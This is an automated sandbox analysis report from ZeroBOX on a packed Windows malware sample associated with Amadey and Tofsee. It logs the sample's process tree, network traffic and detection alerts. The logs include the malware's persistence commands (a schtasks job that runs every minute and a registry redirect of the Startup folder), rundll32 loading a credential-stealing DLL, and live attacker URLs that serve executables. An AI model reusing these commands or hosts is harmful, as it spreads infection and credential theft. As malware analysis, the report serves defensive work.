Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 18, 2021, 9:46 a.m.	June 18, 2021, 9:55 a.m.

Size	2.1MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`8b7f7f3857dd6194924c982d97fd13ce`
SHA256	`ab749e7cd59a78a07a9b31ecaac7ada27da490d97bbe62756c19baa96c64be07`
CRC32	`16DBFA64`
ssdeep	`49152:9EN7Iq5C7hdw6iOBTPnJztIyUKSgMAJjY9URpHAfrWRfKcyN:C7ybNmy6gMA8UzAfrWKl`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

asd.exe "C:\Users\test22\AppData\Local\Temp\asd.exe"
8024
- drbux.exe "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe"
  7768
  - cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\8a643770bf\
    8232
    - reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\8a643770bf\
      4024
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe" /F
    4016
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\ProgramData\ca82a716069a53\cred.dll, Main
    3968

Name	Response	Post-Analysis Lookup
x-vpn.ug	A 193.164.16.141	193.164.16.141
f.hiterima.ru	A 217.107.34.191	217.107.34.191

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
193.164.16.141	Active	Moloch
217.107.34.191	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49822 -> 217.107.34.191:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49823 -> 217.107.34.191:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 217.107.34.191:443 -> 192.168.56.102:49824	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49826 -> 217.107.34.191:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 217.107.34.191:443 -> 192.168.56.102:49828	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49818 -> 217.107.34.191:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49831 -> 217.107.34.191:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 217.107.34.191:443 -> 192.168.56.102:49832	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 217.107.34.191:443 -> 192.168.56.102:49819	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49813 -> 193.164.16.141:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.102:49816 -> 217.107.34.191:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49834 -> 217.107.34.191:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49835 -> 217.107.34.191:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 217.107.34.191:443 -> 192.168.56.102:49836	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49813 -> 193.164.16.141:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.102:49830 -> 217.107.34.191:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49827 -> 217.107.34.191:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 193.164.16.141:80 -> 192.168.56.102:49814	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 193.164.16.141:80 -> 192.168.56.102:49814	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW June 18, 2021, 9:46 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 18, 2021, 9:47 a.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW June 18, 2021, 9:46 a.m.	buffer: SUCCESS: The scheduled task "drbux.exe" has successfully been created. console_handle: 0x00000007	1	1	0
WriteConsoleW June 18, 2021, 9:46 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 18, 2021, 9:47 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (4 events)

section
section	.imports
section	.themida
section	.boot

One or more processes crashed (6 events)

Time & API	Arguments	Status
__exception__ June 18, 2021, 9:46 a.m.	stacktrace: asd+0x304cc5 @ 0xf84cc5 asd+0x2e8893 @ 0xf68893 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3734972 registers.edi: 13398016 registers.eax: 3734972 registers.ebp: 3735052 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 2000778283 registers.ecx: 1877606400	1
__exception__ June 18, 2021, 9:46 a.m.	stacktrace: exception.instruction_r: ed e9 dc 59 03 00 54 95 fd 9e 46 7d 00 00 79 00 exception.symbol: asd+0x2e46bb exception.instruction: in eax, dx exception.module: asd.exe exception.exception_code: 0xc0000096 exception.offset: 3032763 exception.address: 0xf646bb registers.esp: 3735092 registers.edi: 6762965 registers.eax: 1750617430 registers.ebp: 13398016 registers.edx: 6772822 registers.ebx: 0 registers.esi: 13 registers.ecx: 20	1
__exception__ June 18, 2021, 9:46 a.m.	stacktrace: exception.instruction_r: ed e9 85 e1 ff ff c3 e9 9e e1 ff ff 3f 05 05 87 exception.symbol: asd+0x31b875 exception.instruction: in eax, dx exception.module: asd.exe exception.exception_code: 0xc0000096 exception.offset: 3258485 exception.address: 0xf9b875 registers.esp: 3735092 registers.edi: 6762965 registers.eax: 1447909480 registers.ebp: 13398016 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 13 registers.ecx: 10	1
__exception__ June 18, 2021, 9:46 a.m.	stacktrace: drbux+0x304cc5 @ 0x504cc5 drbux+0x2e8893 @ 0x4e8893 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 9763956 registers.edi: 2387968 registers.eax: 9763956 registers.ebp: 9764036 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 2000778283 registers.ecx: 2518155264	1
__exception__ June 18, 2021, 9:46 a.m.	stacktrace: exception.instruction_r: ed e9 dc 59 03 00 54 95 fd 9e 46 7d 00 00 79 00 exception.symbol: drbux+0x2e46bb exception.instruction: in eax, dx exception.module: drbux.exe exception.exception_code: 0xc0000096 exception.offset: 3032763 exception.address: 0x4e46bb registers.esp: 9764076 registers.edi: 14234178 registers.eax: 1750617430 registers.ebp: 2387968 registers.edx: 14243926 registers.ebx: 0 registers.esi: 13 registers.ecx: 20	1
__exception__ June 18, 2021, 9:46 a.m.	stacktrace: exception.instruction_r: ed e9 85 e1 ff ff c3 e9 9e e1 ff ff 3f 05 05 87 exception.symbol: drbux+0x31b875 exception.instruction: in eax, dx exception.module: drbux.exe exception.exception_code: 0xc0000096 exception.offset: 3258485 exception.address: 0x51b875 registers.esp: 9764076 registers.edi: 14234178 registers.eax: 1447909480 registers.ebp: 2387968 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 13 registers.ecx: 10	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (5 events)

suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://x-vpn.ug/hfV3vDtt/index.php
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://x-vpn.ug/hfV3vDtt/index.php?scr=1
suspicious_features	GET method with no useragent header	suspicious_request	GET http://f.hiterima.ru/87435972.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://x-vpn.ug/hfV3vDtt/plugins/cred.dll
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://x-vpn.ug//hfV3vDtt/index.php

Performs some HTTP requests (5 events)

request	POST http://x-vpn.ug/hfV3vDtt/index.php
request	POST http://x-vpn.ug/hfV3vDtt/index.php?scr=1
request	GET http://f.hiterima.ru/87435972.exe
request	GET http://x-vpn.ug/hfV3vDtt/plugins/cred.dll
request	POST http://x-vpn.ug//hfV3vDtt/index.php

Sends data using the HTTP POST Method (3 events)

request	POST http://x-vpn.ug/hfV3vDtt/index.php
request	POST http://x-vpn.ug/hfV3vDtt/index.php?scr=1
request	POST http://x-vpn.ug//hfV3vDtt/index.php

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

f.hiterima.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (27 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7743f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x773b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00caf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ca8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ca8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 36864 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ca8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 7768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7743f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 7768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x773b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 7768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0022f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 7768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00228000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 7768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00228000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 7768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 36864 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00228000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:46 a.m.	process_identifier: 7768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76891000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x765b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e80000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73771000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74471000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72da4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e01000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71f61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x66fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x66fc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73321000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2021, 9:47 a.m.	process_identifier: 3968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x66fb1000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

drbux.exe tried to sleep 479 seconds, actually delayed analysis time by 479 seconds

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe
file	C:\ProgramData\ca82a716069a53\cred.dll

Creates a suspicious process (3 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\8a643770bf\

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW June 18, 2021, 9:46 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe	1	1
ShellExecuteExW June 18, 2021, 9:46 a.m.	show_type: 0 filepath_r: cmd parameters: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\8a643770bf\ filepath: cmd	1	1
ShellExecuteExW June 18, 2021, 9:46 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\test22\AppData\Local\Temp\8a643770bf\drbux.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW June 18, 2021, 9:47 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\ProgramData\ca82a716069a53\cred.dll, Main filepath: rundll32.exe	1	1

An executable file was downloaded by the process drbux.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile June 18, 2021, 9:47 a.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*à¡X¤°@@ð@à& CODE `DATA´°@ÀBSSÝ Ð®À.idata&à®@À.edata@ð¾@P.relocÀ@P.rsrc Þ@P@ò@P@ StringX@X@x;@;@;@;@;@ø8@9@P9@TObjectd@TObjectX@System@ IInterfaceÀFSystemÿÿÌD$øéAJD$øé_JD$øéiJÌÌ±@»@Å@ÀFÑ@@L@Ý@L@@x;@ÐZ@ÜZ@;@;@ìZ@9@P9@TInterfacedObjectÀÿ%¨áAÀÿ%¤áAÀÿ% áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%\|áAÀÿ%¼áAÀÿ%xáAÀÿ%¸áAÀÿ%táAÀÿ%páAÀÿ%láAÀÿ%háAÀÿ%dáAÀÿ%`áAÀÿ%\áAÀÿ%XáAÀÿ%TáAÀÿ%PáAÀÿ%LáAÀÿ%HáAÀÿ%´áAÀÿ%DáAÀÿ%@áAÀÿ%<áAÀÿ%ÌáAÀÿ%ÈáAÀÿ%ÄáAÀÿ%8áAÀÿ%4áAÀÿ%ÜáAÀÿ%ØáAÀÿ%ÔáAÀÿ%0áAÀÿ%,áAÀÿ%(áAÀÿ%$áAÀSÄ¼» TèYÿÿÿöD$,t·\$0ÃÄD[ÃÀÿ% áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀSÄô»àÕA;uYhDjè¦ÿÿÿD$\|$u3À$ëPD$ÜÕAD$£ÜÕA3ÀÐÒL$TÑT$T$ T$@øduÜD$D$D$$$Ä[Ã@ÃÀSVÄøòØèfÿÿÿD$\|$u3Àë:T$BFT$B$D$$D$X$T$PD$°YZ^[ÃÄøP$T$$L$ T$$JàÕA£àÕAYZÃÀSVWUÄøÙðüBCD$RÊ/M;Èuèÿÿÿ@@CëC;Ðuèqÿÿÿ@CD$;7u®ÓÆèúþÿÿÀu3ÀYZ]_^[Ã@SVWUÄð$ôD$ @;ÈØ>_ùz;ßrv;Èu!BAB)BxuVèðþÿÿëMØ>_ùz;ßu B)Bë3Z\$>.}+û\|$+ÈHT$èMþÿÿÀu3Àë°ë;D$Yÿÿÿ3ÀÄ]_^[ÃSVWÚðþ}¾ëÆÿÿæÿÿsjh Vjè4ýÿÿø;ÿt#Ó¸äÕAèÜýÿÿÀuhjPèýÿÿ3À_^[ÃSVWUÙòèÇCjh hUèáüÿÿø;ÿuÆÿÿæÿÿsjh VUè¼üÿÿ;t#Ó¸äÕAèeýÿÿÀuhjPèüÿÿ3À]_^[ÃSVWUÄèùôÇD$ÿÿÿÿ3ÉL$D$T$T$¡äÕAëkD$X;\$rRÃB;D$wE;\$s\$hh;l$vl$hj@PèüÿÿÀu ÇÀÕAèýÿÿD$¸äÕA;u3À\|$tD$D$+D$GÄ]_^[ÃÀSVWUÄèÙ$t$\|$l$ÐÊáðÿÿL$$ÂÿâðÿÿT$D$D$+D$C¡äÕAë[@@E;D$sD$E;D$vD$E;EsjhE+PPè&ûÿÿÀu3Àë¸äÕA;uÄ]_^[ÃSVWUÄè$t$\|$\$ÐêÅÿåðÿÿl$$âðÿÿT$D$D$+D$A¡äÕAëX@@;D$sD$;D$vD$;s h@+PPèwúÿÿÀu ÇÀÕA¸äÕA;uÄ]_^[ÃÀSVWUÄôÚðü½ôÕAÆÿ?æÀÿÿEëA;p4Ë@ÖèJþÿÿ;t_CBC)BxuGèûÿÿë>;/u»ÓÆèmüÿÿ;t&L$ÓÅèûÿÿ\|$uL$Sè"ýÿÿ3ÀÄ]_^[ÃÀSVWUÄè$úØt$½ôÕAÇÿ?çÀÿÿEë;.t;Xuï;Xu_;x×+P@AL$è5üÿÿ\|$t3L$T$Åèoúÿÿ\|$uL$T$D$èüÿÿ$3ÒéL$×Ãèîûÿÿ\|$t4L$T$Åè(úÿÿ\|$TÿÿÿL$T$D$è4üÿÿ$3ÒëRh;ÝuB;x;$Å×è×üÿÿ$8t.$@B$@)Bxuèùÿÿë$3ÒÄ]_^[ÃSÄèÙÿ?áÀÿÿ$ÐâÀÿÿT$D$;$v_ËT$+$$èýÿÿL$Ó¸ôÕAè]ùÿÿ\$ÛtL$T$ÃènûÿÿD$D$D$D$\|$tT$¸ôÕAè©ùÿÿë3ÀÄ[ÃÀUìQ3ÒUhì@dÿ2d"hÄÕAè¼÷ÿÿ=EÐAt hÄÕAè±÷ÿÿ¸äÕAèCøÿÿ¸ôÕAè9øÿÿ¸ ÖAè/øÿÿhøjè_÷ÿÿ£ÖA=ÖAt@¸ÖA3ÉLô@=uìÇEüÖAEüUüPEüUüEü£ÖAÆ¼ÕA3ÀZYYdhó@=EÐAt hÄÕAè!÷ÿÿÃéW"ëå ¼ÕAY]ÃUì request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (7 events)

section

{u'size_of_data': u'0x00012595', u'virtual_address': u'0x00001000', u'entropy': 7.976451111720309, u'name': u' ', u'virtual_size': u'0x00026076'}

entropy

7.97645111172

description